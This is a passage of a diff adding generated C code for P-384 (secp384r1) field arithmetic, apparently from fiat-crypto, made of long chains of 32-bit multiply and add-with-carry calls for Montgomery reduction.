(arg1[9])); ++ fiat_secp384r1_mulx_u32(&x129, &x130, x1, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x131, &x132, x1, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x133, &x134, x1, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x135, &x136, x1, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x137, &x138, x1, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x139, &x140, x1, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x141, &x142, x1, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x143, &x144, x1, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x145, &x146, x1, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x147, &x148, 0x0, x146, x143); ++ fiat_secp384r1_addcarryx_u32(&x149, &x150, x148, x144, x141); ++ fiat_secp384r1_addcarryx_u32(&x151, &x152, x150, x142, x139); ++ fiat_secp384r1_addcarryx_u32(&x153, &x154, x152, x140, x137); ++ fiat_secp384r1_addcarryx_u32(&x155, &x156, x154, x138, x135); ++ fiat_secp384r1_addcarryx_u32(&x157, &x158, x156, x136, x133); ++ fiat_secp384r1_addcarryx_u32(&x159, &x160, x158, x134, x131); ++ fiat_secp384r1_addcarryx_u32(&x161, &x162, x160, x132, x129); ++ fiat_secp384r1_addcarryx_u32(&x163, &x164, x162, x130, x127); ++ fiat_secp384r1_addcarryx_u32(&x165, &x166, x164, x128, x125); ++ fiat_secp384r1_addcarryx_u32(&x167, &x168, x166, x126, x123); ++ x169 = (x168 + x124); ++ fiat_secp384r1_addcarryx_u32(&x170, &x171, 0x0, x99, x145); ++ fiat_secp384r1_addcarryx_u32(&x172, &x173, x171, x101, x147); ++ fiat_secp384r1_addcarryx_u32(&x174, &x175, x173, x103, x149); ++ fiat_secp384r1_addcarryx_u32(&x176, &x177, x175, x105, x151); ++ fiat_secp384r1_addcarryx_u32(&x178, &x179, x177, x107, x153); ++ fiat_secp384r1_addcarryx_u32(&x180, &x181, x179, x109, x155); ++ fiat_secp384r1_addcarryx_u32(&x182, &x183, x181, x111, x157); ++ fiat_secp384r1_addcarryx_u32(&x184, &x185, x183, x113, x159); ++ fiat_secp384r1_addcarryx_u32(&x186, &x187, x185, x115, x161); ++ fiat_secp384r1_addcarryx_u32(&x188, &x189, x187, x117, x163); ++ fiat_secp384r1_addcarryx_u32(&x190, &x191, x189, x119, x165); ++ fiat_secp384r1_addcarryx_u32(&x192, &x193, x191, x121, x167); ++ fiat_secp384r1_addcarryx_u32(&x194, &x195, x193, x122, x169); ++ fiat_secp384r1_mulx_u32(&x196, &x197, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x198, &x199, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x200, &x201, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x202, &x203, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x204, &x205, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x206, &x207, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x208, &x209, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x210, &x211, x170, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x212, &x213, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x214, &x215, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x216, &x217, 0x0, x213, x210); ++ fiat_secp384r1_addcarryx_u32(&x218, &x219, x217, x211, x208); ++ fiat_secp384r1_addcarryx_u32(&x220, &x221, x219, x209, x206); ++ fiat_secp384r1_addcarryx_u32(&x222, &x223, x221, x207, x204); ++ fiat_secp384r1_addcarryx_u32(&x224, &x225, x223, x205, x202); ++ fiat_secp384r1_addcarryx_u32(&x226, &x227, x225, x203, x200); ++ fiat_secp384r1_addcarryx_u32(&x228, &x229, x227, x201, x198); ++ fiat_secp384r1_addcarryx_u32(&x230, &x231, x229, x199, x196); ++ x232 = (x231 + x197); ++ fiat_secp384r1_addcarryx_u32(&x233, &x234, 0x0, x170, x214); ++ fiat_secp384r1_addcarryx_u32(&x235, &x236, x234, x172, x215); ++ fiat_secp384r1_addcarryx_u32(&x237, &x238, x236, x174, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x239, &x240, x238, x176, x212); ++ fiat_secp384r1_addcarryx_u32(&x241, &x242, x240, x178, x216); ++ fiat_secp384r1_addcarryx_u32(&x243, &x244, x242, x180, x218); ++ fiat_secp384r1_addcarryx_u32(&x245, &x246, x244, x182, x220); ++ fiat_secp384r1_addcarryx_u32(&x247, &x248, x246, x184, x222); ++ fiat_secp384r1_addcarryx_u32(&x249, &x250, x248, x186, x224); ++ fiat_secp384r1_addcarryx_u32(&x251, &x252, x250, x188, x226); ++ fiat_secp384r1_addcarryx_u32(&x253, &x254, x252, x190, x228); ++ fiat_secp384r1_addcarryx_u32(&x255, &x256, x254, x192, x230); ++ fiat_secp384r1_addcarryx_u32(&x257, &x258, x256, x194, x232); ++ x259 = ((uint32_t)x258 + x195); ++ fiat_secp384r1_mulx_u32(&x260, &x261, x2, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x262, &x263, x2, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x264, &x265, x2, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x266, &x267, x2, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x268, &x269, x2, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x270, &x271, x2, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x272, &x273, x2, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x274, &x275, x2, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x276, &x277, x2, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x278, &x279, x2, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x280, &x281, x2, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x282, &x283, x2, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x284, &x285, 0x0, x283, x280); ++ fiat_secp384r1_addcarryx_u32(&x286, &x287, x285, x281, x278); ++ fiat_secp384r1_addcarryx_u32(&x288, &x289, x287, x279, x276); ++ fiat_secp384r1_addcarryx_u32(&x290, &x291, x289, x277, x274); ++ fiat_secp384r1_addcarryx_u32(&x292, &x293, x291, x275, x272); ++ fiat_secp384r1_addcarryx_u32(&x294, &x295, x293, x273, x270); ++ fiat_secp384r1_addcarryx_u32(&x296, &x297, x295, x271, x268); ++ fiat_secp384r1_addcarryx_u32(&x298, &x299, x297, x269, x266); ++ fiat_secp384r1_addcarryx_u32(&x300, &x301, x299, x267, x264); ++ fiat_secp384r1_addcarryx_u32(&x302, &x303, x301, x265, x262); ++ fiat_secp384r1_addcarryx_u32(&x304, &x305, x303, x263, x260); ++ x306 = (x305 + x261); ++ fiat_secp384r1_addcarryx_u32(&x307, &x308, 0x0, x235, x282); ++ fiat_secp384r1_addcarryx_u32(&x309, &x310, x308, x237, x284); ++ fiat_secp384r1_addcarryx_u32(&x311, &x312, x310, x239, x286); ++ fiat_secp384r1_addcarryx_u32(&x313, &x314, x312, x241, x288); ++ fiat_secp384r1_addcarryx_u32(&x315, &x316, x314, x243, x290); ++ fiat_secp384r1_addcarryx_u32(&x317, &x318, x316, x245, x292); ++ fiat_secp384r1_addcarryx_u32(&x319, &x320, x318, x247, x294); ++ fiat_secp384r1_addcarryx_u32(&x321, &x322, x320, x249, x296); ++ fiat_secp384r1_addcarryx_u32(&x323, &x324, x322, x251, x298); ++ fiat_secp384r1_addcarryx_u32(&x325, &x326, x324, x253, x300); ++ fiat_secp384r1_addcarryx_u32(&x327, &x328, x326, x255, x302); ++ fiat_secp384r1_addcarryx_u32(&x329, &x330, x328, x257, x304); ++ fiat_secp384r1_addcarryx_u32(&x331, &x332, x330, x259, x306); ++ fiat_secp384r1_mulx_u32(&x333, &x334, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x335, &x336, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x337, &x338, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x339, &x340, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x341, &x342, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x343, &x344, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x345, &x346, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x347, &x348, x307, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x349, &x350, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x351, &x352, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x353, &x354, 0x0, x350, x347); ++ fiat_secp384r1_addcarryx_u32(&x355, &x356, x354, x348, x345); ++ fiat_secp384r1_addcarryx_u32(&x357, &x358, x356, x346, x343); ++ fiat_secp384r1_addcarryx_u32(&x359, &x360, x358, x344, x341); ++ fiat_secp384r1_addcarryx_u32(&x361, &x362, x360, x342, x339); ++ fiat_secp384r1_addcarryx_u32(&x363, &x364, x362, x340, x337); ++ fiat_secp384r1_addcarryx_u32(&x365, &x366, x364, x338, x335); ++ fiat_secp384r1_addcarryx_u32(&x367, &x368, x366, x336, x333); ++ x369 = (x368 + x334); ++ fiat_secp384r1_addcarryx_u32(&x370, &x371, 0x0, x307, x351); ++ fiat_secp384r1_addcarryx_u32(&x372, &x373, x371, x309, x352); ++ fiat_secp384r1_addcarryx_u32(&x374, &x375, x373, x311, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x376, &x377, x375, x313, x349); ++ fiat_secp384r1_addcarryx_u32(&x378, &x379, x377, x315, x353); ++ fiat_secp384r1_addcarryx_u32(&x380, &x381, x379, x317, x355); ++ fiat_secp384r1_addcarryx_u32(&x382, &x383, x381, x319, x357); ++ fiat_secp384r1_addcarryx_u32(&x384, &x385, x383, x321, x359); ++ fiat_secp384r1_addcarryx_u32(&x386, &x387, x385, x323, x361); ++ fiat_secp384r1_addcarryx_u32(&x388, &x389, x387, x325, x363); ++ fiat_secp384r1_addcarryx_u32(&x390, &x391, x389, x327, x365); ++ fiat_secp384r1_addcarryx_u32(&x392, &x393, x391, x329, x367); ++ fiat_secp384r1_addcarryx_u32(&x394, &x395, x393, x331, x369); ++ x396 = ((uint32_t)x395 + x332); ++ fiat_secp384r1_mulx_u32(&x397, &x398, x3, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x399, &x400, x3, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x401, &x402, x3, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x403, &x404, x3, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x405, &x406, x3, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x407, &x408, x3, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x409, &x410, x3, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x411, &x412, x3, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x413, &x414, x3, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x415, &x416, x3, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x417, &x418, x3, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x419, &x420, x3, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x421, &x422, 0x0, x420, x417); ++ fiat_secp384r1_addcarryx_u32(&x423, &x424, x422, x418, x415); ++ fiat_secp384r1_addcarryx_u32(&x425, &x426, x424, x416, x413); ++ fiat_secp384r1_addcarryx_u32(&x427, &x428, x426, x414, x411); ++ fiat_secp384r1_addcarryx_u32(&x429, &x430, x428, x412, x409); ++ fiat_secp384r1_addcarryx_u32(&x431, &x432, x430, x410, x407); ++ fiat_secp384r1_addcarryx_u32(&x433, &x434, x432, x408, x405); ++ fiat_secp384r1_addcarryx_u32(&x435, &x436, x434, x406, x403); ++ fiat_secp384r1_addcarryx_u32(&x437, &x438, x436, x404, x401); ++ fiat_secp384r1_addcarryx_u32(&x439, &x440, x438, x402, x399); ++ fiat_secp384r1_addcarryx_u32(&x441, &x442, x440, x400, x397); ++ x443 = (x442 + x398); ++ fiat_secp384r1_addcarryx_u32(&x444, &x445, 0x0, x372, x419); ++ fiat_secp384r1_addcarryx_u32(&x446, &x447, x445, x374, x421); ++ fiat_secp384r1_addcarryx_u32(&x448, &x449, x447, x376, x423); ++ fiat_secp384r1_addcarryx_u32(&x450, &x451, x449, x378, x425); ++ fiat_secp384r1_addcarryx_u32(&x452, &x453, x451, x380, x427); ++ fiat_secp384r1_addcarryx_u32(&x454, &x455, x453, x382, x429); ++ fiat_secp384r1_addcarryx_u32(&x456, &x457, x455, x384, x431); ++ fiat_secp384r1_addcarryx_u32(&x458, &x459, x457, x386, x433); ++ fiat_secp384r1_addcarryx_u32(&x460, &x461, x459, x388, x435); ++ fiat_secp384r1_addcarryx_u32(&x462, &x463, x461, x390, x437); ++ fiat_secp384r1_addcarryx_u32(&x464, &x465, x463, x392, x439); ++ fiat_secp384r1_addcarryx_u32(&x466, &x467, x465, x394, x441); ++ fiat_secp384r1_addcarryx_u32(&x468, &x469, x467, x396, x443); ++ fiat_secp384r1_mulx_u32(&x470, &x471, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x472, &x473, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x474, &x475, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x476, &x477, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x478, &x479, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x480, &x481, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x482, &x483, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x484, &x485, x444, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x486, &x487, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x488, &x489, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x490, &x491, 0x0, x487, x484); ++ fiat_secp384r1_addcarryx_u32(&x492, &x493, x491, x485, x482); ++ fiat_secp384r1_addcarryx_u32(&x494, &x495, x493, x483, x480); ++ fiat_secp384r1_addcarryx_u32(&x496, &x497, x495, x481, x478); ++ fiat_secp384r1_addcarryx_u32(&x498, &x499, x497, x479, x476); ++ fiat_secp384r1_addcarryx_u32(&x500, &x501, x499, x477, x474); ++ fiat_secp384r1_addcarryx_u32(&x502, &x503, x501, x475, x472); ++ fiat_secp384r1_addcarryx_u32(&x504, &x505, x503, x473, x470); ++ x506 = (x505 + x471); ++ fiat_secp384r1_addcarryx_u32(&x507, &x508, 0x0, x444, x488); ++ fiat_secp384r1_addcarryx_u32(&x509, &x510, x508, x446, x489); ++ fiat_secp384r1_addcarryx_u32(&x511, &x512, x510, x448, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x513, &x514, x512, x450, x486); ++ fiat_secp384r1_addcarryx_u32(&x515, &x516, x514, x452, x490); ++ fiat_secp384r1_addcarryx_u32(&x517, &x518, x516, x454, x492); ++ fiat_secp384r1_addcarryx_u32(&x519, &x520, x518, x456, x494); ++ fiat_secp384r1_addcarryx_u32(&x521, &x522, x520, x458, x496); ++ fiat_secp384r1_addcarryx_u32(&x523, &x524, x522, x460, x498); ++ fiat_secp384r1_addcarryx_u32(&x525, &x526, x524, x462, x500); ++ fiat_secp384r1_addcarryx_u32(&x527, &x528, x526, x464, x502); ++ fiat_secp384r1_addcarryx_u32(&x529, &x530, x528, x466, x504); ++ fiat_secp384r1_addcarryx_u32(&x531, &x532, x530, x468, x506); ++ x533 = ((uint32_t)x532 + x469); ++ fiat_secp384r1_mulx_u32(&x534, &x535, x4, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x536, &x537, x4, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x538, &x539, x4, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x540, &x541, x4, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x542, &x543, x4, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x544, &x545, x4, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x546, &x547, x4, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x548, &x549, x4, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x550, &x551, x4, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x552, &x553, x4, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x554, &x555, x4, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x556, &x557, x4, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x558, &x559, 0x0, x557, x554); ++ fiat_secp384r1_addcarryx_u32(&x560, &x561, x559, x555, x552); ++ fiat_secp384r1_addcarryx_u32(&x562, &x563, x561, x553, x550); ++ fiat_secp384r1_addcarryx_u32(&x564, &x565, x563, x551, x548); ++ fiat_secp384r1_addcarryx_u32(&x566, &x567, x565, x549, x546); ++ fiat_secp384r1_addcarryx_u32(&x568, &x569, x567, x547, x544); ++ fiat_secp384r1_addcarryx_u32(&x570, &x571, x569, x545, x542); ++ fiat_secp384r1_addcarryx_u32(&x572, &x573, x571, x543, x540); ++ fiat_secp384r1_addcarryx_u32(&x574, &x575, x573, x541, x538); ++ fiat_secp384r1_addcarryx_u32(&x576, &x577, x575, x539, x536); ++ fiat_secp384r1_addcarryx_u32(&x578, &x579, x577, x537, x534); ++ x580 = (x579 + x535); ++ fiat_secp384r1_addcarryx_u32(&x581, &x582, 0x0, x509, x556); ++ fiat_secp384r1_addcarryx_u32(&x583, &x584, x582, x511, x558); ++ fiat_secp384r1_addcarryx_u32(&x585, &x586, x584, x513, x560); ++ fiat_secp384r1_addcarryx_u32(&x587, &x588, x586, x515, x562); ++ fiat_secp384r1_addcarryx_u32(&x589, &x590, x588, x517, x564); ++ fiat_secp384r1_addcarryx_u32(&x591, &x592, x590, x519, x566); ++ fiat_secp384r1_addcarryx_u32(&x593, &x594, x592, x521, x568); ++ fiat_secp384r1_addcarryx_u32(&x595, &x596, x594, x523, x570); ++ fiat_secp384r1_addcarryx_u32(&x597, &x598, x596, x525, x572); ++ fiat_secp384r1_addcarryx_u32(&x599, &x600, x598, x527, x574); ++ fiat_secp384r1_addcarryx_u32(&x601, &x602, x600, x529, x576); ++ fiat_secp384r1_addcarryx_u32(&x603, &x604, x602, x531, x578); ++ fiat_secp384r1_addcarryx_u32(&x605, &x606, x604, x533, x580); ++ fiat_secp384r1_mulx_u32(&x607, &x608, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x609, &x610, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x611, &x612, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x613, &x614, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x615, &x616, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x617, &x618, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x619, &x620, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x621, &x622, x581, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x623, &x624, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x625, &x626, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x627, &x628, 0x0, x624, x621); ++ fiat_secp384r1_addcarryx_u32(&x629, &x630, x628, x622, x619); ++ fiat_secp384r1_addcarryx_u32(&x631, &x632, x630, x620, x617); ++ fiat_secp384r1_addcarryx_u32(&x633, &x634, x632, x618, x615); ++ fiat_secp384r1_addcarryx_u32(&x635, &x636, x634, x616, x613); ++ fiat_secp384r1_addcarryx_u32(&x637, &x638, x636, x614, x611); ++ fiat_secp384r1_addcarryx_u32(&x639, &x640, x638, x612, x609); ++ fiat_secp384r1_addcarryx_u32(&x641, &x642, x640, x610, x607); ++ x643 = (x642 + x608); ++ fiat_secp384r1_addcarryx_u32(&x644, &x645, 0x0, x581, x625); ++ fiat_secp384r1_addcarryx_u32(&x646, &x647, x645, x583, x626); ++ fiat_secp384r1_addcarryx_u32(&x648, &x649, x647, x585, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x650, &x651, x649, x587, x623); ++ fiat_secp384r1_addcarryx_u32(&x652, &x653, x651, x589, x627); ++ fiat_secp384r1_addcarryx_u32(&x654, &x655, x653, x591, x629); ++ fiat_secp384r1_addcarryx_u32(&x656, &x657, x655, x593, x631); ++ fiat_secp384r1_addcarryx_u32(&x658, &x659, x657, x595, x633); ++ fiat_secp384r1_addcarryx_u32(&x660, &x661, x659, x597, x635); ++ fiat_secp384r1_addcarryx_u32(&x662, &x663, x661, x599, x637); ++ fiat_secp384r1_addcarryx_u32(&x664, &x665, x663, x601, x639); ++ fiat_secp384r1_addcarryx_u32(&x666, &x667, x665, x603, x641); ++ fiat_secp384r1_addcarryx_u32(&x668, &x669, x667, x605, x643); ++ x670 = ((uint32_t)x669 + x606); ++ fiat_secp384r1_mulx_u32(&x671, &x672, x5, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x673, &x674, x5, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x675, &x676, x5, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x677, &x678, x5, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x679, &x680, x5, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x681, &x682, x5, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x683, &x684, x5, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x685, &x686, x5, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x687, &x688, x5, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x689, &x690, x5, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x691, &x692, x5, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x693, &x694, x5, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x695, &x696, 0x0, x694, x691); ++ fiat_secp384r1_addcarryx_u32(&x697, &x698, x696, x692, x689); ++ fiat_secp384r1_addcarryx_u32(&x699, &x700, x698, x690, x687); ++ fiat_secp384r1_addcarryx_u32(&x701, &x702, x700, x688, x685); ++ fiat_secp384r1_addcarryx_u32(&x703, &x704, x702, x686, x683); ++ fiat_secp384r1_addcarryx_u32(&x705, &x706, x704, x684, x681); ++ fiat_secp384r1_addcarryx_u32(&x707, &x708, x706, x682, x679); ++ fiat_secp384r1_addcarryx_u32(&x709, &x710, x708, x680, x677); ++ fiat_secp384r1_addcarryx_u32(&x711, &x712, x710, x678, x675); ++ fiat_secp384r1_addcarryx_u32(&x713, &x714, x712, x676, x673); ++ fiat_secp384r1_addcarryx_u32(&x715, &x716, x714, x674, x671); ++ x717 = (x716 + x672); ++ fiat_secp384r1_addcarryx_u32(&x718, &x719, 0x0, x646, x693); ++ fiat_secp384r1_addcarryx_u32(&x720, &x721, x719, x648, x695); ++ fiat_secp384r1_addcarryx_u32(&x722, &x723, x721, x650, x697); ++ fiat_secp384r1_addcarryx_u32(&x724, &x725, x723, x652, x699); ++ fiat_secp384r1_addcarryx_u32(&x726, &x727, x725, x654, x701); ++ fiat_secp384r1_addcarryx_u32(&x728, &x729, x727, x656, x703); ++ fiat_secp384r1_addcarryx_u32(&x730, &x731, x729, x658, x705); ++ fiat_secp384r1_addcarryx_u32(&x732, &x733, x731, x660, x707); ++ fiat_secp384r1_addcarryx_u32(&x734, &x735, x733, x662, x709); ++ fiat_secp384r1_addcarryx_u32(&x736, &x737, x735, x664, x711); ++ fiat_secp384r1_addcarryx_u32(&x738, &x739, x737, x666, x713); ++ fiat_secp384r1_addcarryx_u32(&x740, &x741, x739, x668, x715); ++ fiat_secp384r1_addcarryx_u32(&x742, &x743, x741, x670, x717); ++ fiat_secp384r1_mulx_u32(&x744, &x745, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x746, &x747, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x748, &x749, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x750, &x751, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x752, &x753, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x754, &x755, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x756, &x757, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x758, &x759, x718, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x760, &x761, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x762, &x763, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x764, &x765, 0x0, x761, x758); ++ fiat_secp384r1_addcarryx_u32(&x766, &x767, x765, x759, x756); ++ fiat_secp384r1_addcarryx_u32(&x768, &x769, x767, x757, x754); ++ fiat_secp384r1_addcarryx_u32(&x770, &x771, x769, x755, x752); ++ fiat_secp384r1_addcarryx_u32(&x772, &x773, x771, x753, x750); ++ fiat_secp384r1_addcarryx_u32(&x774, &x775, x773, x751, x748); ++ fiat_secp384r1_addcarryx_u32(&x776, &x777, x775, x749, x746); ++ fiat_secp384r1_addcarryx_u32(&x778, &x779, x777, x747, x744); ++ x780 = (x779 + x745); ++ fiat_secp384r1_addcarryx_u32(&x781, &x782, 0x0, x718, x762); ++ fiat_secp384r1_addcarryx_u32(&x783, &x784, x782, x720, x763); ++ fiat_secp384r1_addcarryx_u32(&x785, &x786, x784, x722, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x787, &x788, x786, x724, x760); ++ fiat_secp384r1_addcarryx_u32(&x789, &x790, x788, x726, x764); ++ fiat_secp384r1_addcarryx_u32(&x791, &x792, x790, x728, x766); ++ fiat_secp384r1_addcarryx_u32(&x793, &x794, x792, x730, x768); ++ fiat_secp384r1_addcarryx_u32(&x795, &x796, x794, x732, x770); ++ fiat_secp384r1_addcarryx_u32(&x797, &x798, x796, x734, x772); ++ fiat_secp384r1_addcarryx_u32(&x799, &x800, x798, x736, x774); ++ fiat_secp384r1_addcarryx_u32(&x801, &x802, x800, x738, x776); ++ fiat_secp384r1_addcarryx_u32(&x803, &x804, x802, x740, x778); ++ fiat_secp384r1_addcarryx_u32(&x805, &x806, x804, x742, x780); ++ x807 = ((uint32_t)x806 + x743); ++ fiat_secp384r1_mulx_u32(&x808, &x809, x6, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x810, &x811, x6, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x812, &x813, x6, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x814, &x815, x6, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x816, &x817, x6, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x818, &x819, x6, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x820, &x821, x6, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x822, &x823, x6, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x824, &x825, x6, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x826, &x827, x6, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x828, &x829, x6, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x830, &x831, x6, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x832, &x833, 0x0, x831, x828); ++ fiat_secp384r1_addcarryx_u32(&x834, &x835, x833, x829, x826); ++ fiat_secp384r1_addcarryx_u32(&x836, &x837, x835, x827, x824); ++ fiat_secp384r1_addcarryx_u32(&x838, &x839, x837, x825, x822); ++ fiat_secp384r1_addcarryx_u32(&x840, &x841, x839, x823, x820); ++ fiat_secp384r1_addcarryx_u32(&x842, &x843, x841, x821, x818); ++ fiat_secp384r1_addcarryx_u32(&x844, &x845, x843, x819, x816); ++ fiat_secp384r1_addcarryx_u32(&x846, &x847, x845, x817, x814); ++ fiat_secp384r1_addcarryx_u32(&x848, &x849, x847, x815, x812); ++ fiat_secp384r1_addcarryx_u32(&x850, &x851, x849, x813, x810); ++ fiat_secp384r1_addcarryx_u32(&x852, &x853, x851, x811, x808); ++ x854 = (x853 + x809); ++ fiat_secp384r1_addcarryx_u32(&x855, &x856, 0x0, x783, x830); ++ fiat_secp384r1_addcarryx_u32(&x857, &x858, x856, x785, x832); ++ fiat_secp384r1_addcarryx_u32(&x859, &x860, x858, x787, x834); ++ fiat_secp384r1_addcarryx_u32(&x861, &x862, x860, x789, x836); ++ fiat_secp384r1_addcarryx_u32(&x863, &x864, x862, x791, x838); ++ fiat_secp384r1_addcarryx_u32(&x865, &x866, x864, x793, x840); ++ fiat_secp384r1_addcarryx_u32(&x867, &x868, x866, x795, x842); ++ fiat_secp384r1_addcarryx_u32(&x869, &x870, x868, x797, x844); ++ fiat_secp384r1_addcarryx_u32(&x871, &x872, x870, x799, x846); ++ fiat_secp384r1_addcarryx_u32(&x873, &x874, x872, x801, x848); ++ fiat_secp384r1_addcarryx_u32(&x875, &x876, x874, x803, x850); ++ fiat_secp384r1_addcarryx_u32(&x877, &x878, x876, 